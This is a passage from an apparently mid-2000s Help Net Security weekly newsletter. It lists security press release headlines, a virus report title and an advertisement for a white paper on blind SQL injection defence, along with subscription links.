Integrated Security Offering
http://www.net-security.org/press.php?id=3699


ISF Warns Of Spit And Other New Security Threats From VOIP
http://www.net-security.org/press.php?id=3698


Debenhams Selects PortWise Software Platform for Secure Application
Access for both Employees and Partners
http://www.net-security.org/press.php?id=3697


Apani Networks Debuts Industry’s Most Scalable Software for Securing
Inside the Network Perimeter; EpiForce 2.0 Launched at Interop-New
York
http://www.net-security.org/press.php?id=3696


Apani Networks Joins the Microsoft Network Access Protection Program
http://www.net-security.org/press.php?id=3695


Self Destruct Messages No Longer ‘Mission Impossible’ Thanks To
‘Stealthtext’
http://www.net-security.org/press.php?id=3694

----------------------------------------------------------------




[ Virus News ]


All virus news are located at:
http://www.net-security.org/viruses.php


----------------------------------------------------------------

Weekly Report on Viruses and Intruders - Mitglieder.GK,
WmaDownloader.B, Banbra.BOK and Bancos.LU Trojans
http://www.net-security.org/virus_news.php?id=599

----------------------------------------------------------------



----------------------------------------------------------------
"How A Hacker Launches A Blind SQL Injection Attack Step-by-Step" WP
----------------------------------------------------------------
The newest web app vulnerability... Blind SQL Injection!
Even if your web application does not return error messages, it may
still be open to a Blind SQL Injection Attack. Blind SQL Injection can
deliver total control of your server to a hacker giving them the ability
to read, write and manipulate all data stored in your backend systems!
Download this *FREE* white paper from SPI Dynamics for a complete guide
to protection!
----------------------------------------------------------------
Download whitepaper from: http://www.net-security.org/v/spidyn2
----------------------------------------------------------------

Questions, contributions, comments or ideas go to:

Help Net Security staff
staff@net-security.org
http://net-security.org

----------------------

Unsubscribe from this weekly digest on:
http://www.net-security.org/subscribe.php

The archive of the newsletter in TXT and PDF format is available
http://www.net-security.org/newsletter_archive.php

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:4
posted:10/14/2012
language:English
pages:22